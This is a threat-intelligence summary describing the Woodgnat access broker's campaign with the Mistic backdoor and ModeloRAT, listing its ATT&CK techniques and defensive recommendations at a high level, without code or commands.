EXECUTIVE SUMMARY
A financially motivated cybercrime group known as Woodgnat is actively deploying a new stealthy backdoor called Mistic alongside the ModeloRAT remote access trojan. This initial access broker focuses on gaining durable entry into enterprise networks to sell access to ransomware affiliates rather than deploying final payloads themselves. The campaign targets organizations across diverse sectors, including insurance, education, and professional services, with a primary goal of data theft and enabling subsequent ransomware operations. Their opportunistic approach involves casting a wide net to identify high-value victims for their criminal partners.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
A financially motivated cybercrime group known as Woodgnat is actively deploying a new stealthy backdoor called Mistic alongside the ModeloRAT remote access trojan. This initial access broker focuses on gaining durable entry into enterprise networks to sell access to ransomware affiliates rather than deploying final payloads themselves. The campaign targets organizations across diverse sectors, including insurance, education, and professional services, with a primary goal of data theft and enabling subsequent ransomware operations. Their opportunistic approach involves casting a wide net to identify high-value victims for their criminal partners.[emaillocker id="1283"]
Attackers initiate intrusions by tricking users into executing malicious commands through social engineering lures on compromised websites or fraudulent external Teams messages posing as IT support. Once inside, the group uses a technique called DLL sideloading to execute the Mistic backdoor, which runs entirely in memory to avoid leaving traces on the disk. The malware establishes persistence by masquerading as legitimate remote access software and uses standard system tools for reconnaissance and lateral movement. Operators maintain control through encrypted command channels and can wipe their tracks using a built-in kill switch.
This threat poses significant risks because the fileless nature of the backdoor allows attackers to remain undetected for long periods, facilitating extensive data staging before ransomware deployment. Defending against this campaign requires organizations to strictly enforce application allowlisting and monitor for unusual PowerShell activity or unsolicited remote support requests. Security teams should verify the legitimacy of external communications before following instructions and ensure endpoint detection tools are configured to identify memory-resident threats. Regular offline backups remain critical to recovering data if access brokers successfully hand off the network to ransomware operators.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1189 | Drive-by Compromise | — |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1574.001 | Hijack Execution Flow | DLL Search Order Hijacking |
| Defense Evasion | T1070.004 | Indicator Removal | File Deletion |
| Credential Access | T1558.003 | Steal or Forge Kerberos Tickets | Kerberoasting |
| Lateral Movement | T1047 | Windows Management Instrumentation | — |
| Collection | T1113 | Screen Capture | — |
| Command and Control | T1568.002 | Dynamic Resolution | Domain Generation Algorithms |
| Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol | Exfiltration Over Unencrypted Non-C2 Protocol |
REFERENCES:
The reports contain further technical details:
https://www.security.com/threat-intelligence/new-mistic-backdoor-modelorat